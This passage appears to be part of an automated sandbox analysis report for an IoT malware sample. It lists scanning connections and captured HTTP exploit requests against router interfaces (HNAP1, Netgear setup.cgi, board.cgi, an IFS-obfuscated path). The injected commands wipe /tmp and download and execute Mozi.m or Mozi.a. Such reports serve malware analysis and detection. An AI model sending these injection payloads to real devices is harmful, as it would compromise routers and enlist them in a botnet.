Source: global traffic	TCP traffic: 192.168.2.23:47830 -> 104.124.138.162:7574
Source: global traffic	TCP traffic: 192.168.2.23:42214 -> 159.30.123.214:8080
Source: global traffic	TCP traffic: 192.168.2.23:55192 -> 112.92.126.161:81
Source: global traffic	TCP traffic: 192.168.2.23:56302 -> 32.214.208.69:8080
Source: global traffic	TCP traffic: 192.168.2.23:36968 -> 222.194.111.214:81
Source: global traffic	TCP traffic: 192.168.2.23:53400 -> 136.135.67.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:58932 -> 108.102.15.248:49152
Source: global traffic	TCP traffic: 192.168.2.23:54988 -> 152.32.239.105:7574
Source: global traffic	TCP traffic: 192.168.2.23:40172 -> 119.86.10.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:47458 -> 188.196.133.125:7574
Source: global traffic	TCP traffic: 192.168.2.23:60924 -> 108.98.47.191:7574
Source: global traffic	TCP traffic: 192.168.2.23:33518 -> 217.253.146.237:8080
Source: global traffic	TCP traffic: 192.168.2.23:59722 -> 69.108.114.191:8080
Source: global traffic	TCP traffic: 192.168.2.23:53618 -> 54.145.80.37:7574
Source: global traffic	TCP traffic: 192.168.2.23:60268 -> 167.186.88.61:8080
Source: global traffic	TCP traffic: 192.168.2.23:36812 -> 13.176.101.116:5555
Source: global traffic	TCP traffic: 192.168.2.23:37730 -> 123.220.165.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:49306 -> 101.128.14.171:8080
Source: global traffic	TCP traffic: 192.168.2.23:46712 -> 71.237.233.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:54394 -> 97.214.225.77:8080
Source: global traffic	TCP traffic: 192.168.2.23:60920 -> 175.159.51.155:8443
Source: global traffic	TCP traffic: 192.168.2.23:60302 -> 80.165.24.201:49152
Source: global traffic	TCP traffic: 192.168.2.23:57046 -> 110.227.113.91:7574
Source: global traffic	TCP traffic: 192.168.2.23:52702 -> 190.44.47.65:7574
Source: global traffic	TCP traffic: 192.168.2.23:51742 -> 179.189.34.214:8080
Source: global traffic	TCP traffic: 192.168.2.23:36874 -> 39.78.92.24:5555
Source: global traffic	TCP traffic: 192.168.2.23:50072 -> 61.136.166.60:7574
Source: global traffic	TCP traffic: 192.168.2.23:47324 -> 180.56.181.78:8443
Source: global traffic	TCP traffic: 192.168.2.23:39020 -> 25.124.19.1:8080
Source: global traffic	TCP traffic: 192.168.2.23:37468 -> 163.70.239.141:8080
Source: global traffic	TCP traffic: 192.168.2.23:56534 -> 154.209.186.99:8080
Source: global traffic	TCP traffic: 192.168.2.23:56168 -> 156.79.252.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:41450 -> 150.183.254.151:8443
Source: global traffic	TCP traffic: 192.168.2.23:59576 -> 128.99.50.75:8443
Source: global traffic	TCP traffic: 192.168.2.23:33750 -> 207.23.195.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:51780 -> 35.157.254.248:81
Source: global traffic	TCP traffic: 192.168.2.23:43076 -> 44.87.62.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:41696 -> 204.222.113.90:52869
Source: global traffic	TCP traffic: 192.168.2.23:37926 -> 196.90.18.214:8080
Source: global traffic	TCP traffic: 192.168.2.23:54196 -> 74.40.185.41:49152
Source: global traffic	TCP traffic: 192.168.2.23:48750 -> 50.183.64.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:57648 -> 189.5.17.154:49152
Source: global traffic	TCP traffic: 192.168.2.23:36196 -> 87.218.139.104:5555
Source: global traffic	TCP traffic: 192.168.2.23:56564 -> 141.39.142.235:49152
Source: global traffic	TCP traffic: 192.168.2.23:34032 -> 173.168.230.134:5555
Source: global traffic	TCP traffic: 192.168.2.23:42898 -> 135.132.50.2:8080
Source: global traffic	TCP traffic: 192.168.2.23:43430 -> 155.117.206.189:7574
Source: global traffic	TCP traffic: 192.168.2.23:60896 -> 187.123.230.15:49152
Source: global traffic	TCP traffic: 192.168.2.23:47806 -> 30.183.116.123:52869
Source: global traffic	TCP traffic: 192.168.2.23:38182 -> 15.47.138.219:7574
Source: global traffic	TCP traffic: 192.168.2.23:41508 -> 106.99.159.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:32996 -> 93.179.249.7:52869
Source: global traffic	TCP traffic: 192.168.2.23:33710 -> 86.149.250.90:81
Source: global traffic	TCP traffic: 192.168.2.23:56454 -> 1.186.104.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:45788 -> 17.37.210.45:8080
Source: global traffic	TCP traffic: 192.168.2.23:33682 -> 154.40.176.203:8080
Source: global traffic	TCP traffic: 192.168.2.23:60478 -> 18.96.20.44:7574
Source: global traffic	TCP traffic: 192.168.2.23:52610 -> 37.75.243.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:34644 -> 167.25.83.96:8080
Source: global traffic	TCP traffic: 192.168.2.23:35996 -> 39.139.127.27:8443
Source: global traffic	TCP traffic: 192.168.2.23:53524 -> 28.49.67.223:7574
Source: global traffic	TCP traffic: 192.168.2.23:52930 -> 142.88.201.162:8443
Source: global traffic	TCP traffic: 192.168.2.23:37750 -> 180.24.184.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:42132 -> 33.4.10.136:8080
Source: global traffic	TCP traffic: 192.168.2.23:50096 -> 180.80.137.123:37215
Source: global traffic	TCP traffic: 192.168.2.23:51034 -> 131.143.33.147:49152
Source: global traffic	TCP traffic: 192.168.2.23:45856 -> 203.30.37.220:81
Source: global traffic	TCP traffic: 192.168.2.23:37320 -> 71.87.10.180:81
Source: global traffic	TCP traffic: 192.168.2.23:40188 -> 131.201.134.61:8443
Source: global traffic	TCP traffic: 192.168.2.23:59334 -> 23.59.67.176:8080
Source: global traffic	TCP traffic: 192.168.2.23:49492 -> 8.161.244.39:8080
Source: global traffic	TCP traffic: 192.168.2.23:58018 -> 164.245.55.194:8080
Source: global traffic	TCP traffic: 192.168.2.23:44800 -> 157.212.14.189:7574
Source: global traffic	TCP traffic: 192.168.2.23:35216 -> 176.13.132.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:54940 -> 142.203.21.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:48684 -> 90.190.106.86:7574
Source: global traffic	TCP traffic: 192.168.2.23:46082 -> 79.158.209.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:57140 -> 180.72.77.231:8080
Source: global traffic	TCP traffic: 192.168.2.23:42284 -> 188.211.80.92:8443
Source: global traffic	TCP traffic: 192.168.2.23:41116 -> 202.86.252.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:37666 -> 168.170.73.87:49152
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 73.200.97.48:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 168.1.29.187:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 48.206.148.192:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 40.18.22.171:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 40.98.164.223:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 176.12.232.2:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 145.135.118.204:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 180.213.220.125:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 18.219.84.147:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 18.239.250.11:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 62.127.244.68:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 91.174.136.141:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 58.207.50.87:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 88.60.130.88:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 44.184.27.87:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 32.128.184.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 136.26.139.2:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 106.174.193.199:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 154.42.87.191:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 95.66.109.66:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 194.90.140.138:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 1.254.14.188:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 1.139.65.221:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 147.153.130.88:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 23.253.150.110:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 47.122.9.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 9.250.80.191:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 167.225.142.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 95.95.10.141:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 206.86.250.97:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 141.149.87.107:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 222.236.44.101:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 57.170.53.252:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 173.5.24.192:2323
Source: global traffic	TCP traffic: 192.168.2.23:59284 -> 75.7.224.140:5555
Source: global traffic	TCP traffic: 192.168.2.23:45682 -> 86.218.177.227:7574
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 194.121.42.217:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 42.220.29.36:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 95.18.160.31:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 190.66.28.210:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 35.70.9.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 68.93.148.57:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 94.173.147.55:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 62.57.142.53:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 202.243.251.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 218.5.113.13:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 1.70.131.88:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 151.70.111.225:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 193.116.200.219:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 78.73.127.74:1023
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 222.235.111.175:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 78.54.254.32:2323
Source: global traffic	TCP traffic: 192.168.2.23:24176 -> 206.153.201.153:2323
Source: global traffic	TCP traffic: 192.168.2.23:33082 -> 107.190.50.203:52869
Source: global traffic	TCP traffic: 192.168.2.23:40410 -> 197.25.112.91:81
Source: global traffic	TCP traffic: 192.168.2.23:47568 -> 92.64.112.242:8443
Source: global traffic	TCP traffic: 192.168.2.23:53454 -> 108.155.169.234:7574

Source: /tmp/ZFvtIZszMd (PID: 5260)

Socket: 0.0.0.0::42337

Jump to behavior

Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 64.34.159.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 207.154.230.111:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.199.110.112:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.73.33.104:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
